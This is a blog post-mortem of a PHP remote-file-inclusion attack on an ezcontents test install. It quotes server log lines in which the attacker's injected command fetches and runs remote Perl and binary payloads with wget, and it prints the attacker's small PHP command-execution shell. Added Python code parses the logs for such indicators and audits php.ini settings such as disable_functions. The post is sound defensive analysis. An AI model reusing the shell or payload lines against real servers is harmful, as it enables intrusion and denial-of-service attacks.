More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point I had updated the ezcontents script for the main site (averyjparker.com), but for about two years I had left a testbed install at averyjparker.com/ncgen2, where I had been trying to set up a platform for an upgrade of the old genealogy site (www.averyjparker.com/ncgen; the new site is now at www.northcarolinagenealogy.net, linked at the top of the page). So, in searching through the logs, here are some of the entries that caught my attention.

63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:42 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"

The first entry is the IP address, then the datestamp, then the specific request (usually starting with POST or GET and ending with the version of the protocol). Next you see 404; that's the result code, and a 404 means this file wasn't found.

What troubled me about the suspicious entries is that the result code was 200 (file found) and they were passing various bits of information to a PHP file (/ncgen2//include/db.php) which did exist.
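To make that field-by-field reading mechanical, here is an added example (my code, not from the post, ezcontents, or the hosting provider) that parses Apache combined-format lines and flags exactly what set the db.php requests apart: a query parameter carrying a remote URL where a local path is expected, a GLOBALS[...] key, command words in a parameter value, and a 200 on a .php file that exists. The sample lines are the post's own entries joined back onto single lines, plus one constructed benign request; the indicator names and severity labels are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Sample input: the post's log entries rejoined onto single lines (the blog
# wrapped them), plus one constructed benign request at the end.
SAMPLE_LOG = """\
63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.0.2.10 - - [14/Jul/2005:13:40:00 -0600] "GET /ncgen2/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed benign request)"
"""

# Apache "combined" log format, field by field as the post describes it:
# client IP, identity, user, timestamp, request line, status, bytes, referer, UA.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)
# Command words at the start of a value or right after a shell separator.
SHELL_CMD_RE = re.compile(r'(^|[\s;|&])(wget|curl|perl|chmod|bash|sh)(\s|$)')


def parse_query(query):
    """Split a query string on '&' only (never on ';', which here is part of
    the injected command) and percent-decode each key and value."""
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        key, _, value = chunk.partition('=')
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyse_line(line):
    """Return a finding dict for a request carrying remote-include or
    command-injection indicators, or None for an ordinary request."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m['target'])
    indicators = set()
    for key, value in parse_query(url.query):
        if key.startswith('GLOBALS['):
            indicators.add('globals_overwrite')   # register_globals-style variable poisoning
        if REMOTE_URL_RE.match(value):
            indicators.add('remote_include')      # a URL where a local path is expected
        if SHELL_CMD_RE.search(value):
            indicators.add('shell_command')       # command words in a parameter value
    if not indicators:
        return None
    status = int(m['status'])
    return {
        'ip': m['ip'],
        'path': url.path,
        'status': status,
        'indicators': sorted(indicators),
        # A 200 on an existing .php file means the script ran with the injected
        # input; a 403/404 means the request never reached a handler.
        'severity': 'high' if status == 200 and url.path.endswith('.php') else 'attempt',
    }


def scan(log_text):
    """Run analyse_line over every line and keep the findings."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the two cgi-bin probes and the benign request produce nothing, while the three db.php requests come back as high-severity findings from 200.174.133.132 with all three indicators set. The same scan is a reasonable first pass over a real access_log, with the caveat that any value containing a URL will be flagged, so expect noise from legitimate redirect or referrer parameters.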

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load that file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file, by the way). It's basically an HTML file wrapped around this...
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace("&gt;", ">", str_replace("&lt;", "<", $output));
?>
OK, so they're trying to inject this file, http://www.caniggiamatador.com/dos.pl, and http://www.caniggiamatador.com/perldos.pl

I looked at the code there, and they were basically bash scripts that set up a denial of service attack on a specified target. Fairly clever, and commented in Portuguese or Spanish. I've actually spent some time studying Spanish, but there was a lot that was either misspelled or that I simply didn't understand.

The site is down now, by the way. It looks like it was hosted by http://www.internetters.net/, and I suspect my service provider dealt with contacting them.

Since I'm a fairly curious person... I was also interested in the IP address that was originating the requests, 200.174.133.132. An IP whois lookup turned up this...

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I'm guessing a dialup(?) customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I'd spent researching the issue and verified that was the file they were exploiting and that it was a DoS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disable_functions: system, cmd, shell_exec, passthru, popen

These changes were made in the hope of preventing a future breach by the same method.
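As an added illustration of what that php.ini change buys, and what it does not (my code, not the provider's notes or anything from the post), here is a small audit of the three settings that make this class of attack work: register_globals (on the PHP versions of the time, my reading is that this is what let a GLOBALS[rootdp]=... query parameter overwrite a variable the script used to build an include path), allow_url_fopen / allow_url_include (which let include() fetch and run a remote URL such as lila.jpg), and disable_functions (the provider's mitigation). Both php.ini fragments are constructed; the provider's real file is not reproduced in the post. allow_url_include is a directive added in PHP 5.2, after this incident, so the check falls back to allow_url_fopen when it is absent, which is how PHP 4 and early PHP 5 behaved. exec and proc_open are my additions to the provider's list.

```python
# Constructed php.ini fragments for this example; the provider's real file is
# not reproduced in the post.
WEAK_INI = """\
[PHP]
register_globals = On
allow_url_fopen = On
; disable_functions is left at its empty default
display_errors = On
"""

HARDENED_INI = """\
[PHP]
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system, shell_exec, passthru, popen, exec, proc_open
display_errors = Off
"""

# The provider's list from the post plus exec and proc_open (my additions).
REQUIRED_DISABLED = {'system', 'shell_exec', 'passthru', 'popen', 'exec', 'proc_open'}


def parse_php_ini(text):
    """Minimal php.ini reader: drops ';' comments and [section] headers and
    returns a dict of lower-cased directive -> value."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        key, sep, value = line.partition('=')
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini boolean spellings."""
    return value.strip().lower() in ('1', 'on', 'yes', 'true')


def audit(ini_text):
    """Return a list of (directive, message) findings for the settings that made
    the db.php injection possible. Defaults follow PHP 4.2+: register_globals
    Off, allow_url_fopen On, allow_url_include Off."""
    s = parse_php_ini(ini_text)
    findings = []

    if is_on(s.get('register_globals', 'Off')):
        findings.append(('register_globals',
                         'On: a query parameter such as GLOBALS[rootdp]=... can '
                         'overwrite variables the script uses to build include paths'))

    # PHP >= 5.2 gates include() of URLs on allow_url_include; earlier versions
    # used allow_url_fopen for both the file functions and include().
    if 'allow_url_include' in s:
        url_include_allowed = is_on(s['allow_url_include'])
    else:
        url_include_allowed = is_on(s.get('allow_url_fopen', 'On'))
    if url_include_allowed:
        findings.append(('allow_url_fopen',
                         'include()/require() will fetch and run a remote URL '
                         '(set allow_url_include=Off, or allow_url_fopen=Off on PHP < 5.2)'))

    disabled = {f.strip().lower()
                for f in s.get('disable_functions', '').split(',') if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append(('disable_functions',
                         'command-execution functions still enabled: ' + ', '.join(missing)))
    return findings


if __name__ == '__main__':
    for label, ini in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(label, audit(ini) or 'no findings')
```

Two practical notes. cmd in the provider's list is not a PHP function, so that entry is inert and the audit simply ignores it. More importantly, disable_functions only blocks the listed calls inside whatever code gets included; it does nothing about the remote include itself, which is why the audit checks register_globals and the allow_url_* directives first.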

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did they find my site to attack? Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.
